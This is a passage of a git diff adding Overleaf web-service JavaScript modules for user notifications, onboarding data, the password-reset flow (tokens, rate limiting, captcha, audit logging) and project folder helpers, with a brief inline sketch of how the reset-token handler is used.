+          }
+
+          const key = `ip-matched-affiliation-${body.id}`
+          const portalPath = body.portal_slug
+            ? `/${body.is_university ? 'edu' : 'org'}/${body.portal_slug}`
+            : undefined
+          const messageOpts = {
+            university_name: body.name,
+            institutionId: body.id,
+            content: body.enrolment_ad_html,
+            portalPath,
+            ssoEnabled: body.sso_enabled,
+          }
+          NotificationsHandler.createNotification(
+            userId,
+            key,
+            'notification_ip_matched_affiliation',
+            messageOpts,
+            null,
+            false,
+            callback
+          )
+        }
+      )
+    },
+
+    read(universityId, callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      const key = `ip-matched-affiliation-${universityId}`
+      NotificationsHandler.markAsReadWithKey(userId, key, callback)
+    },
+  }
+}
+
+function tpdsFileLimit(userId) {
+  return {
+    key: `tpdsFileLimit-${userId}`,
+    create(projectName, projectId, callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      const messageOpts = {
+        projectName,
+        projectId,
+      }
+      NotificationsHandler.createNotification(
+        userId,
+        this.key,
+        'notification_tpds_file_limit',
+        messageOpts,
+        null,
+        true,
+        callback
+      )
+    },
+    read(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      NotificationsHandler.markAsReadByKeyOnly(this.key, callback)
+    },
+  }
+}
+
+function groupInvitation(userId, subscriptionId, managedUsersEnabled) {
+  return {
+    key: `groupInvitation-${subscriptionId}-${userId}`,
+    create(invite, callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      const messageOpts = {
+        token: invite.token,
+        inviterName: invite.inviterName,
+        managedUsersEnabled,
+      }
+      NotificationsHandler.createNotification(
+        userId,
+        this.key,
+        'notification_group_invitation',
+        messageOpts,
+        null,
+        true,
+        callback
+      )
+    },
+    read(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      NotificationsHandler.markAsReadByKeyOnly(this.key, callback)
+    },
+  }
+}
+
+function personalAndGroupSubscriptions(userId) {
+  return {
+    key: 'personal-and-group-subscriptions',
+    create(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      NotificationsHandler.createNotification(
+        userId,
+        this.key,
+        'notification_personal_and_group_subscriptions',
+        {},
+        null,
+        false,
+        callback
+      )
+    },
+    read(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      NotificationsHandler.markAsReadByKeyOnly(this.key, callback)
+    },
+  }
+}
+
+const NotificationsBuilder = {
+  // Note: notification keys should be url-safe
+  dropboxUnlinkedDueToLapsedReconfirmation,
+  dropboxDuplicateProjectNames,
+  featuresUpgradedByAffiliation,
+  redundantPersonalSubscription,
+  projectInvite,
+  ipMatcherAffiliation,
+  tpdsFileLimit,
+  groupInvitation,
+  personalAndGroupSubscriptions,
+}
+
+NotificationsBuilder.promises = {
+  dropboxUnlinkedDueToLapsedReconfirmation: function (userId) {
+    return promisifyAll(dropboxUnlinkedDueToLapsedReconfirmation(userId))
+  },
+  redundantPersonalSubscription: function (affiliation, user) {
+    return promisifyAll(redundantPersonalSubscription(affiliation, user))
+  },
+  dropboxDuplicateProjectNames(userId) {
+    return promisifyAll(dropboxDuplicateProjectNames(userId))
+  },
+  featuresUpgradedByAffiliation: function (affiliation, user) {
+    return promisifyAll(featuresUpgradedByAffiliation(affiliation, user))
+  },
+  ipMatcherAffiliation: function (userId) {
+    return promisifyAll(ipMatcherAffiliation(userId))
+  },
+  groupInvitation: function (userId, groupId, managedUsersEnabled) {
+    return promisifyAll(groupInvitation(userId, groupId, managedUsersEnabled))
+  },
+  projectInvite(invite, project, sendingUser, user) {
+    return promisifyAll(projectInvite(invite, project, sendingUser, user))
+  },
+  personalAndGroupSubscriptions(userId) {
+    return promisifyAll(personalAndGroupSubscriptions(userId))
+  },
+}
+
+module.exports = NotificationsBuilder
diff --git a/services/web/app/src/Features/Notifications/NotificationsController.mjs b/services/web/app/src/Features/Notifications/NotificationsController.mjs
new file mode 100644
index 0000000..ae1d920
--- /dev/null
+++ b/services/web/app/src/Features/Notifications/NotificationsController.mjs
@@ -0,0 +1,36 @@
+import NotificationsHandler from './NotificationsHandler.js'
+import SessionManager from '../Authentication/SessionManager.js'
+import _ from 'lodash'
+
+export default {
+  getAllUnreadNotifications(req, res, next) {
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    NotificationsHandler.getUserNotifications(
+      userId,
+      function (err, unreadNotifications) {
+        if (err) {
+          return next(err)
+        }
+        unreadNotifications = _.map(
+          unreadNotifications,
+          function (notification) {
+            notification.html = req.i18n.translate(
+              notification.templateKey,
+              notification.messageOpts
+            )
+            return notification
+          }
+        )
+        res.json(unreadNotifications)
+      }
+    )
+  },
+
+  markNotificationAsRead(req, res) {
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    const { notificationId } = req.params
+    NotificationsHandler.markAsRead(userId, notificationId, () =>
+      res.sendStatus(200)
+    )
+  },
+}
diff --git a/services/web/app/src/Features/Notifications/NotificationsHandler.js b/services/web/app/src/Features/Notifications/NotificationsHandler.js
new file mode 100644
index 0000000..4958ad8
--- /dev/null
+++ b/services/web/app/src/Features/Notifications/NotificationsHandler.js
@@ -0,0 +1,142 @@
+const settings = require('@overleaf/settings')
+const request = require('request')
+const logger = require('@overleaf/logger')
+const _ = require('lodash')
+const { promisifyAll } = require('@overleaf/promise-utils')
+
+const notificationsApi = _.get(settings, ['apis', 'notifications', 'url'])
+const oneSecond = 1000
+
+const makeRequest = function (opts, callback) {
+  if (notificationsApi) {
+    request(opts, callback)
+  } else {
+    callback(null, { statusCode: 200 })
+  }
+}
+
+const NotificationsHandler = {
+  getUserNotifications(userId, callback) {
+    const opts = {
+      uri: `${notificationsApi}/user/${userId}`,
+      json: true,
+      timeout: oneSecond,
+      method: 'GET',
+    }
+    makeRequest(opts, function (err, res, unreadNotifications) {
+      const statusCode = res ? res.statusCode : 500
+      if (err || statusCode !== 200) {
+        logger.err(
+          { err, statusCode },
+          'something went wrong getting notifications'
+        )
+        callback(null, [])
+      } else {
+        if (unreadNotifications == null) {
+          unreadNotifications = []
+        }
+        callback(null, unreadNotifications)
+      }
+    })
+  },
+
+  createNotification(
+    userId,
+    key,
+    templateKey,
+    messageOpts,
+    expiryDateTime,
+    forceCreate,
+    callback
+  ) {
+    if (!callback) {
+      callback = forceCreate
+      forceCreate = true
+    }
+    const payload = {
+      key,
+      messageOpts,
+      templateKey,
+      forceCreate,
+    }
+    if (expiryDateTime) {
+      payload.expires = expiryDateTime
+    }
+    const opts = {
+      uri: `${notificationsApi}/user/${userId}`,
+      timeout: oneSecond,
+      method: 'POST',
+      json: payload,
+    }
+    makeRequest(opts, callback)
+  },
+
+  markAsReadWithKey(userId, key, callback) {
+    const opts = {
+      uri: `${notificationsApi}/user/${userId}`,
+      method: 'DELETE',
+      timeout: oneSecond,
+      json: {
+        key,
+      },
+    }
+    makeRequest(opts, callback)
+  },
+
+  markAsRead(userId, notificationId, callback) {
+    const opts = {
+      method: 'DELETE',
+      uri: `${notificationsApi}/user/${userId}/notification/${notificationId}`,
+      timeout: oneSecond,
+    }
+    makeRequest(opts, callback)
+  },
+
+  // removes notification by key, without regard for user_id,
+  // should not be exposed to user via ui/router
+  markAsReadByKeyOnly(key, callback) {
+    const opts = {
+      uri: `${notificationsApi}/key/${key}`,
+      method: 'DELETE',
+      timeout: oneSecond,
+    }
+    makeRequest(opts, callback)
+  },
+
+  previewMarkAsReadByKeyOnlyBulk(key, callback) {
+    const opts = {
+      uri: `${notificationsApi}/key/${key}/count`,
+      method: 'GET',
+      timeout: 10 * oneSecond,
+      json: true,
+    }
+    makeRequest(opts, (err, res, body) => {
+      if (err) return callback(err)
+      if (res.statusCode !== 200) {
+        return callback(
+          new Error('cannot preview bulk delete notification: ' + key)
+        )
+      }
+      callback(null, (body && body.count) || 0)
+    })
+  },
+
+  markAsReadByKeyOnlyBulk(key, callback) {
+    const opts = {
+      uri: `${notificationsApi}/key/${key}/bulk`,
+      method: 'DELETE',
+      timeout: 10 * oneSecond,
+      json: true,
+    }
+    makeRequest(opts, (err, res, body) => {
+      if (err) return callback(err)
+      if (res.statusCode !== 200) {
+        return callback(new Error('cannot bulk delete notification: ' + key))
+      }
+      callback(null, (body && body.count) || 0)
+    })
+  },
+}
+
+NotificationsHandler.promises = promisifyAll(NotificationsHandler)
+module.exports = NotificationsHandler
diff --git a/services/web/app/src/Features/OnboardingDataCollection/OnboardingDataCollectionManager.js b/services/web/app/src/Features/OnboardingDataCollection/OnboardingDataCollectionManager.js
new file mode 100644
index 0000000..fb4fa84
--- /dev/null
+++ b/services/web/app/src/Features/OnboardingDataCollection/OnboardingDataCollectionManager.js
@@ -0,0 +1,77 @@
+const {
+  OnboardingDataCollection,
+  OnboardingDataCollectionSchema,
+} = require('../../models/OnboardingDataCollection')
+const OError = require('@overleaf/o-error')
+
+async function getOnboardingDataCollection(userId, projection = {}) {
+  try {
+    return await OnboardingDataCollection.findOne(
+      { _id: userId },
+      projection
+    ).exec()
+  } catch (error) {
+    throw OError.tag(error, 'Failed to get OnboardingDataCollection')
+  }
+}
+
+async function getOnboardingDataValue(userId, key) {
+  if (!OnboardingDataCollectionSchema.paths[key]) {
+    throw new Error(`${key} is not a valid onboarding data key`)
+  }
+
+  const result = await getOnboardingDataCollection(userId, { [key]: 1 })
+  return result ? result[key] : null
+}
+
+async function upsertOnboardingDataCollection({
+  userId,
+  firstName,
+  lastName,
+  usedLatex,
+  primaryOccupation,
+  companyDivisionDepartment,
+  companyJobTitle,
+  governmentJobTitle,
+  institutionName,
+  otherJobTitle,
+  nonprofitDivisionDepartment,
+  nonprofitJobTitle,
+  role,
+  subjectArea,
+  updatedAt,
+}) {
+  const odc = await OnboardingDataCollection.findOneAndUpdate(
+    { _id: userId },
+    {
+      firstName,
+      lastName,
+      usedLatex,
+      primaryOccupation,
+      companyDivisionDepartment,
+      companyJobTitle,
+      governmentJobTitle,
+      institutionName,
+      otherJobTitle,
+      nonprofitDivisionDepartment,
+      nonprofitJobTitle,
+      role,
+      subjectArea,
+      updatedAt,
+    },
+    { upsert: true }
+  )
+
+  return odc
+}
+
+function deleteOnboardingDataCollection(id) {
+  return OnboardingDataCollection.deleteOne({ _id: id })
+}
+
+module.exports = {
+  getOnboardingDataCollection,
+  upsertOnboardingDataCollection,
+  deleteOnboardingDataCollection,
+  getOnboardingDataValue,
+}
diff --git a/services/web/app/src/Features/PasswordReset/PasswordResetController.mjs b/services/web/app/src/Features/PasswordReset/PasswordResetController.mjs
new file mode 100644
index 0000000..40e3a06
--- /dev/null
+++ b/services/web/app/src/Features/PasswordReset/PasswordResetController.mjs
@@ -0,0 +1,237 @@
+import PasswordResetHandler from './PasswordResetHandler.mjs'
+import AuthenticationController from '../Authentication/AuthenticationController.js'
+import AuthenticationManager from '../Authentication/AuthenticationManager.js'
+import SessionManager from '../Authentication/SessionManager.js'
+import UserGetter from '../User/UserGetter.js'
+import UserUpdater from '../User/UserUpdater.js'
+import UserSessionsManager from '../User/UserSessionsManager.js'
+import OError from '@overleaf/o-error'
+import EmailsHelper from '../Helpers/EmailHelper.js'
+import { expressify } from '@overleaf/promise-utils'
+import SplitTestHandler from '../SplitTests/SplitTestHandler.js'
+
+async function setNewUserPassword(req, res, next) {
+  let user
+  let { passwordResetToken, password, email } = req.body
+  if (!passwordResetToken || !password) {
+    return res.status(400).json({
+      message: {
+        key: 'invalid-password',
+      },
+    })
+  }
+
+  const err = AuthenticationManager.validatePassword(password, email)
+  if (err) {
+    const message = AuthenticationManager.getMessageForInvalidPasswordError(
+      err,
+      req
+    )
+    return res.status(400).json({ message })
+  }
+
+  passwordResetToken = passwordResetToken.trim()
+
+  const initiatorId = SessionManager.getLoggedInUserId(req.session)
+  // password reset via tokens can be done while logged in, or not
+  const auditLog = {
+    initiatorId,
+    ip: req.ip,
+  }
+
+  try {
+    const result = await PasswordResetHandler.promises.setNewUserPassword(
+      passwordResetToken,
+      password,
+      auditLog
+    )
+    const { found, reset, userId, mustReconfirm } = result
+    if (!found) {
+      return res.status(404).json({
+        message: {
+          key: 'token-expired',
+        },
+      })
+    }
+    if (!reset) {
+      return res.status(500).json({
+        message: req.i18n.translate('error_performing_request'),
+      })
+    }
+    await UserSessionsManager.promises.removeSessionsFromRedis({ _id: userId })
+    if (mustReconfirm) {
+      await UserUpdater.promises.removeReconfirmFlag(userId, auditLog)
+    }
+    if (!req.session.doLoginAfterPasswordReset) {
+      return res.sendStatus(200)
+    }
+    user = await UserGetter.promises.getUser(userId)
+  } catch (error) {
+    if (error.name === 'NotFoundError') {
+      return res.status(404).json({
+        message: {
+          key: 'token-expired',
+        },
+      })
+    } else if (error.name === 'InvalidPasswordError') {
+      return res.status(400).json({
+        message: {
+          key: 'invalid-password',
+        },
+      })
+    } else if (error.name === 'PasswordMustBeDifferentError') {
+      return res.status(400).json({
+        message: {
+          key: 'password-must-be-different',
+        },
+      })
+    } else if (error.name === 'PasswordReusedError') {
+      return res.status(400).json({
+        message: {
+          key: 'password-must-be-strong',
+        },
+      })
+    } else {
+      return res.status(500).json({
+        message: req.i18n.translate('error_performing_request'),
+      })
+    }
+  }
+  AuthenticationController.setAuditInfo(req, {
+    method: 'Password reset, set new password',
+  })
+  AuthenticationController.finishLogin(user, req, res, next)
+}
+
+async function requestReset(req, res, next) {
+  const email = EmailsHelper.parseEmail(req.body.email)
+  if (!email) {
+    return res.status(400).json({
+      message: req.i18n.translate('must_be_email_address'),
+    })
+  }
+
+  let status
+  try {
+    status =
+      await PasswordResetHandler.promises.generateAndEmailResetToken(email)
+  } catch (err) {
+    OError.tag(err, 'failed to generate and email password reset token', {
+      email,
+    })
+    if (err.message === 'user does not have permission for change-password') {
+      return res.status(403).json({
+        message: {
+          key: 'no-password-allowed-due-to-sso',
+        },
+      })
+    }
+    throw err
+  }
+
+  if (status === 'primary') {
+    return res.status(200).json({
+      message: req.i18n.translate('password_reset_email_sent'),
+    })
+  } else if (status === 'secondary') {
+    return res.status(404).json({
+      message: req.i18n.translate('secondary_email_password_reset'),
+    })
+  } else {
+    return res.status(404).json({
+      message: req.i18n.translate('cant_find_email'),
+    })
+  }
+}
+
+async function renderSetPasswordForm(req, res, next) {
+  const { variant } = await SplitTestHandler.promises.getAssignment(
+    req,
+    res,
+    'auth-pages-bs5'
+  )
+
+  if (req.query.passwordResetToken != null) {
+    try {
+      const result =
+        await PasswordResetHandler.promises.getUserForPasswordResetToken(
+          req.query.passwordResetToken
+        )
+
+      const { user, remainingPeeks } = result || {}
+      if (!user || remainingPeeks <= 0) {
+        return res.redirect('/user/password/reset?error=token_expired')
+      }
+      req.session.resetToken = req.query.passwordResetToken
+      if (variant === 'enabled') {
+        req.session.setPasswordBS5 = true
+      }
+
+      let emailQuery = ''
+
+      if (typeof req.query.email === 'string') {
+        const email = EmailsHelper.parseEmail(req.query.email)
+        if (email) {
+          emailQuery = `?email=${encodeURIComponent(email)}`
+        }
+      }
+
+      return res.redirect('/user/password/set' + emailQuery)
+    } catch (err) {
+      if (err.name === 'ForbiddenError') {
+        return next(err)
+      }
+      return res.redirect('/user/password/reset?error=token_expired')
+    }
+  }
+
+  if (req.session.resetToken == null) {
+    return res.redirect('/user/password/reset')
+  }
+
+  const email = EmailsHelper.parseEmail(req.query.email)
+
+  // clean up to avoid leaking the token in the session object
+  const passwordResetToken = req.session.resetToken
+  delete req.session.resetToken
+
+  const template = req.session.setPasswordBS5
+    ? 'user/setPassword-bs5'
+    : 'user/setPassword'
+
+  delete req.session.setPasswordBS5
+
+  res.render(template, {
+    title: 'set_password',
+    email,
+    passwordResetToken,
+  })
+}
+
+async function renderRequestResetForm(req, res) {
+  const errorQuery = req.query.error
+  let error = null
+  if (errorQuery === 'token_expired') {
+    error = 'password_reset_token_expired'
+  }
+  const { variant } = await SplitTestHandler.promises.getAssignment(
+    req,
+    res,
+    'auth-pages-bs5'
+  )
+
+  const template =
+    variant === 'enabled' ? 'user/passwordReset-bs5' : 'user/passwordReset'
+
+  res.render(template, {
+    title: 'reset_password',
+    error,
+  })
}
+
+export default {
+  renderRequestResetForm: expressify(renderRequestResetForm),
+  requestReset: expressify(requestReset),
+  renderSetPasswordForm: expressify(renderSetPasswordForm),
+  setNewUserPassword: expressify(setNewUserPassword),
+}
diff --git a/services/web/app/src/Features/PasswordReset/PasswordResetHandler.mjs b/services/web/app/src/Features/PasswordReset/PasswordResetHandler.mjs
new file mode 100644
index 0000000..094f18b
--- /dev/null
+++ b/services/web/app/src/Features/PasswordReset/PasswordResetHandler.mjs
@@ -0,0 +1,148 @@
+import settings from '@overleaf/settings'
+import UserAuditLogHandler from '../User/UserAuditLogHandler.js'
+import UserGetter from '../User/UserGetter.js'
+import OneTimeTokenHandler from '../Security/OneTimeTokenHandler.js'
+import EmailHandler from '../Email/EmailHandler.js'
+import AuthenticationManager from '../Authentication/AuthenticationManager.js'
+import { callbackify, promisify } from 'node:util'
+import PermissionsManager from '../Authorization/PermissionsManager.js'
+
+const assertUserPermissions = PermissionsManager.promises.assertUserPermissions
+
+const AUDIT_LOG_TOKEN_PREFIX_LENGTH = 10
+
+async function generateAndEmailResetToken(email) {
+  const user = await UserGetter.promises.getUserByAnyEmail(email)
+
+  if (!user) {
+    return null
+  }
+
+  if (user.email !== email) {
+    return 'secondary'
+  }
+
+  await assertUserPermissions(user, ['change-password'])
+
+  const data = { user_id: user._id.toString(), email }
+  const token = await OneTimeTokenHandler.promises.getNewToken('password', data)
+
+  const emailOptions = {
+    to: email,
+    setNewPasswordUrl: `${
+      settings.siteUrl
+    }/user/password/set?passwordResetToken=${token}&email=${encodeURIComponent(
+      email
+    )}`,
+  }
+
+  await EmailHandler.promises.sendEmail('passwordResetRequested', emailOptions)
+
+  return 'primary'
+}
+
+function expirePasswordResetToken(token, callback) {
+  OneTimeTokenHandler.expireToken('password', token, err => {
+    return callback(err)
+  })
+}
+
+async function getUserForPasswordResetToken(token) {
+  let result
+  try {
+    result = await OneTimeTokenHandler.promises.peekValueFromToken(
+      'password',
+      token
+    )
+  } catch (err) {
+    if (err.name === 'NotFoundError') {
+      return
+    } else {
+      throw err
+    }
+  }
+  const { data, remainingPeeks } = result || {}
+
+  if (data == null || data.email == null) {
+    return { user: null, remainingPeeks }
+  }
+
+  const user = await UserGetter.promises.getUserByMainEmail(data.email, {
+    _id: 1,
+    'overleaf.id': 1,
+    email: 1,
+    must_reconfirm: 1,
+  })
+
+  await assertUserPermissions(user, ['change-password'])
+
+  if (user == null) {
+    return { user: null, remainingPeeks: 0 }
+  } else if (data.user_id != null && data.user_id === user._id.toString()) {
+    return { user, remainingPeeks }
+  } else if (
+    data.v1_user_id != null &&
+    user.overleaf != null &&
+    data.v1_user_id === user.overleaf.id
+  ) {
+    return { user, remainingPeeks }
+  } else {
+    return { user: null, remainingPeeks: 0 }
+  }
+}
+
+async function setNewUserPassword(token, password, auditLog) {
+  const result =
+    await PasswordResetHandler.promises.getUserForPasswordResetToken(token)
+  const { user } = result || {}
+
+  if (!user) {
+    return {
+      found: false,
+      reset: false,
+      userId: null,
+    }
+  }
+  await UserAuditLogHandler.promises.addEntry(
+    user._id,
+    'reset-password',
+    auditLog.initiatorId,
+    auditLog.ip,
+    { token: token.substring(0, AUDIT_LOG_TOKEN_PREFIX_LENGTH) }
+  )
+
+  const reset = await AuthenticationManager.promises.setUserPassword(
+    user,
+    password
+  )
+
+  await PasswordResetHandler.promises.expirePasswordResetToken(token)
+
+  return {
+    found: true,
+    reset,
+    userId: user._id,
+    mustReconfirm: user.must_reconfirm,
+  }
+}
+
+const PasswordResetHandler = {
+  generateAndEmailResetToken: callbackify(generateAndEmailResetToken),
+
+  setNewUserPassword: callbackify(setNewUserPassword),
+
+  getUserForPasswordResetToken: callbackify(getUserForPasswordResetToken),
+
+  expirePasswordResetToken,
+}
+
+PasswordResetHandler.promises = {
+  generateAndEmailResetToken,
+  getUserForPasswordResetToken,
+  expirePasswordResetToken: promisify(
+    PasswordResetHandler.expirePasswordResetToken
+  ),
+  setNewUserPassword,
+}
+
+export default PasswordResetHandler
diff --git a/services/web/app/src/Features/PasswordReset/PasswordResetRouter.mjs b/services/web/app/src/Features/PasswordReset/PasswordResetRouter.mjs
new file mode 100644
index 0000000..e750d11
--- /dev/null
+++ b/services/web/app/src/Features/PasswordReset/PasswordResetRouter.mjs
@@ -0,0 +1,77 @@
+import PasswordResetController from './PasswordResetController.mjs'
+import AuthenticationController from '../Authentication/AuthenticationController.js'
+import CaptchaMiddleware from '../../Features/Captcha/CaptchaMiddleware.js'
+import { RateLimiter } from '../../infrastructure/RateLimiter.js'
+import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js'
+import { Joi, validate } from '../../infrastructure/Validation.js'
+
+const rateLimiter = new RateLimiter('password_reset_rate_limit', {
+  points: 6,
+  duration: 60,
+})
+
+export default {
+  apply(webRouter) {
+    const rateLimit = RateLimiterMiddleware.rateLimit(rateLimiter, {
+      ipOnly: true,
+    })
+
+    webRouter.get(
+      '/user/password/reset',
+      validate({
+        query: { error: Joi.string() },
+      }),
+      PasswordResetController.renderRequestResetForm
+    )
+    webRouter.post(
+      '/user/password/reset',
+      validate({
+        body: Joi.object({
+          email: Joi.string().required(),
+        }),
+      }),
+      rateLimit,
+      CaptchaMiddleware.validateCaptcha('passwordReset'),
+      PasswordResetController.requestReset
+    )
+    AuthenticationController.addEndpointToLoginWhitelist('/user/password/reset')
+
+    webRouter.get(
+      '/user/password/set',
+      validate({
+        query: {
+          email: Joi.string().required(),
+          passwordResetToken: Joi.string(),
+        },
+      }),
+      rateLimit,
+      PasswordResetController.renderSetPasswordForm
+    )
+    webRouter.post(
+      '/user/password/set',
+      validate({
+        body: Joi.object({
+          password: Joi.string().required(),
+          passwordResetToken: Joi.string().required(),
+        }),
+      }),
+      rateLimit,
+      PasswordResetController.setNewUserPassword
+    )
+    AuthenticationController.addEndpointToLoginWhitelist('/user/password/set')
+
+    webRouter.post(
+      '/user/reconfirm',
+      validate({
+        body: Joi.object({
+          email: Joi.string().required(),
+        }),
+      }),
+      rateLimit,
+      CaptchaMiddleware.validateCaptcha('passwordReset'),
+      PasswordResetController.requestReset
+    )
+  },
+
+  rateLimiter,
+}
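
For reference, a minimal sketch of the reset-token lifecycle implemented by PasswordResetHandler and wired up by the router above. The handler methods and their return shapes are taken from the source; the email, password, token value and audit-log fields here are illustrative only:

import PasswordResetHandler from './PasswordResetHandler.mjs'

async function demoPasswordReset(email, newPassword, ip) {
  // 1. Generate a one-time token and email it to the user. Resolves to
  //    'primary' (sent), 'secondary' (a secondary address, no token sent)
  //    or null (no matching user).
  const status =
    await PasswordResetHandler.promises.generateAndEmailResetToken(email)
  if (status !== 'primary') return false

  // 2. The emailed link carries the token; peek at it without consuming it,
  //    as the controller does before rendering the set-password form.
  const token = 'token-from-the-emailed-link' // illustrative value
  const { user, remainingPeeks } =
    (await PasswordResetHandler.promises.getUserForPasswordResetToken(token)) ||
    {}
  if (!user || remainingPeeks <= 0) return false

  // 3. Set the new password; this writes an audit-log entry (storing only a
  //    token prefix) and expires the token so it cannot be reused.
  const { found, reset } =
    await PasswordResetHandler.promises.setNewUserPassword(token, newPassword, {
      initiatorId: user._id,
      ip,
    })
  return found && reset
}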
diff --git a/services/web/app/src/Features/Project/DocLinesComparitor.mjs b/services/web/app/src/Features/Project/DocLinesComparitor.mjs
new file mode 100644
index 0000000..43c8ad1
--- /dev/null
+++ b/services/web/app/src/Features/Project/DocLinesComparitor.mjs
@@ -0,0 +1,13 @@
+// TODO: This file was created by bulk-decaffeinate.
+// Sanity-check the conversion and remove this comment.
+import _ from 'lodash'
+
+export default {
+  areSame(lines1, lines2) {
+    if (!Array.isArray(lines1) || !Array.isArray(lines2)) {
+      return false
+    }
+
+    return _.isEqual(lines1, lines2)
+  },
+}
diff --git a/services/web/app/src/Features/Project/FolderStructureBuilder.js b/services/web/app/src/Features/Project/FolderStructureBuilder.js
new file mode 100644
index 0000000..d091c71
--- /dev/null
+++ b/services/web/app/src/Features/Project/FolderStructureBuilder.js
@@ -0,0 +1,73 @@
+const Path = require('path')
+const OError = require('@overleaf/o-error')
+const { ObjectId } = require('mongodb-legacy')
+
+module.exports = { buildFolderStructure }
+
+function buildFolderStructure(docEntries, fileEntries) {
+  const builder = new FolderStructureBuilder()
+  for (const docEntry of docEntries) {
+    builder.addDocEntry(docEntry)
+  }
+  for (const fileEntry of fileEntries) {
+    builder.addFileEntry(fileEntry)
+  }
+  return builder.rootFolder
+}
+
+class FolderStructureBuilder {
+  constructor() {
+    this.foldersByPath = new Map()
+    this.entityPaths = new Set()
+    this.rootFolder = this.createFolder('rootFolder')
+    this.foldersByPath.set('/', this.rootFolder)
+    this.entityPaths.add('/')
+  }
+
+  addDocEntry(docEntry) {
+    this.recordEntityPath(docEntry.path)
+    const folderPath = Path.dirname(docEntry.path)
+    const folder = this.mkdirp(folderPath)
+    folder.docs.push(docEntry.doc)
+  }
+
+  addFileEntry(fileEntry) {
+    this.recordEntityPath(fileEntry.path)
+    const folderPath = Path.dirname(fileEntry.path)
+    const folder = this.mkdirp(folderPath)
+    folder.fileRefs.push(fileEntry.file)
+  }
+
+  mkdirp(path) {
+    const existingFolder = this.foldersByPath.get(path)
+    if (existingFolder != null) {
+      return existingFolder
+    }
+    // Folder not found, create it.
+    this.recordEntityPath(path)
+    const dirname = Path.dirname(path)
+    const basename = Path.basename(path)
+    const parentFolder = this.mkdirp(dirname)
+    const newFolder = this.createFolder(basename)
+    parentFolder.folders.push(newFolder)
+    this.foldersByPath.set(path, newFolder)
+    return newFolder
+  }
+
+  recordEntityPath(path) {
+    if (this.entityPaths.has(path)) {
+      throw new OError('entity already exists', { path })
+    }
+    this.entityPaths.add(path)
+  }
+
+  createFolder(name) {
+    return {
+      _id: new ObjectId(),
+      name,
+      folders: [],
+      docs: [],
+      fileRefs: [],
+    }
+  }
+}
diff --git a/services/web/app/src/Features/Project/IterablePath.js b/services/web/app/src/Features/Project/IterablePath.js
new file mode 100644
index 0000000..52cf068
--- /dev/null
+++ b/services/web/app/src/Features/Project/IterablePath.js
@@ -0,0 +1,15 @@
+/**
+ * Handles malformed filetrees - when fields such as `folder.docs`,
+ * `folder.folders` or `folder.fileRefs` are missing it returns an
+ * empty array.
+ */
+function iterablePaths(folder, field) {
+  if (!folder) {
+    return []
+  }
+  return folder[field] || []
+}
+
+module.exports = {
+  iterablePaths,
+}
diff --git a/services/web/app/src/Features/Project/ProjectApiController.mjs b/services/web/app/src/Features/Project/ProjectApiController.mjs
new file mode 100644
index 0000000..afdc0f3
--- /dev/null
+++ b/services/web/app/src/Features/Project/ProjectApiController.mjs
@@ -0,0 +1,30 @@
+/* eslint-disable
+  max-len,
+  no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+import ProjectDetailsHandler from './ProjectDetailsHandler.js'
+
+import logger from '@overleaf/logger'
+
+export default {
+  getProjectDetails(req, res, next) {
+    const { project_id: projectId } = req.params
+    return ProjectDetailsHandler.getDetails(
+      projectId,
+      function (err, projDetails) {
+        if (err != null) {
+          return next(err)
+        }
+        return res.json(projDetails)
+      }
+    )
+  },
+}
diff --git a/services/web/app/src/Features/Project/ProjectAuditLogHandler.js b/services/web/app/src/Features/Project/ProjectAuditLogHandler.js
new file mode 100644
index 0000000..1c31e1b
--- /dev/null
+++ b/services/web/app/src/Features/Project/ProjectAuditLogHandler.js
@@ -0,0 +1,57 @@
+const logger = require('@overleaf/logger')
+const { ProjectAuditLogEntry } = require('../../models/ProjectAuditLogEntry')
+const { callbackify } = require('@overleaf/promise-utils')
+
+module.exports = {
+  promises: {
+    addEntry,
+  },
+  addEntry: callbackify(addEntry), // callback version of addEntry
+  addEntryInBackground,
+}
+
+/**
+ * Add an audit log entry
+ *
+ * The entry should include at least the following fields:
+ *
+ * - operation: a string identifying the type of operation
+ * - userId: the user on behalf of whom the operation was performed
+ * - message: a string detailing what happened
+ */
+async function addEntry(
+  projectId,
+  operation,
+  initiatorId,
+  ipAddress,
+  info = {}
+) {
+  const entry = {
+    projectId,
+    operation,
+    initiatorId,
+    ipAddress,
+    info,
+  }
+  await ProjectAuditLogEntry.create(entry)
+}
+
+/**
+ * Add an audit log entry in the background
+ *
+ * This function doesn't return a promise. Instead, it catches any error and logs it.
+ */
+function addEntryInBackground(
+  projectId,
+  operation,
+  initiatorId,
+  ipAddress,
+  info = {}
+) {
+  addEntry(projectId, operation, initiatorId, ipAddress, info).catch(err => {
+    logger.error(
+      { err, projectId, operation, initiatorId, ipAddress, info },
+      'Failed to write audit log'
+    )
+  })
+}
diff --git a/services/web/app/src/Features/Project/ProjectCollabratecDetailsHandler.js b/services/web/app/src/Features/Project/ProjectCollabratecDetailsHandler.js
new file mode 100644
index 0000000..59547e7
--- /dev/null
+++ b/services/web/app/src/Features/Project/ProjectCollabratecDetailsHandler.js
@@ -0,0 +1,100 @@
+const { ObjectId } = require('mongodb-legacy')
+const { Project } = require('../../models/Project')
+const { callbackifyAll } = require('@overleaf/promise-utils')
+
+const ProjectCollabratecDetailsHandler = {
+  async initializeCollabratecProject(
+    projectId,
+    userId,
+    collabratecDocumentId,
+    collabratecPrivategroupId
+  ) {
+    return await ProjectCollabratecDetailsHandler.setCollabratecUsers(
+      projectId,
+      [
+        {
+          user_id: userId,
+          collabratec_document_id: collabratecDocumentId,
+          collabratec_privategroup_id: collabratecPrivategroupId,
+        },
+      ]
+    )
+  },
+
+  async isLinkedCollabratecUserProject(projectId, userId) {
+    projectId = new ObjectId(projectId)
+    userId = new ObjectId(userId)
+
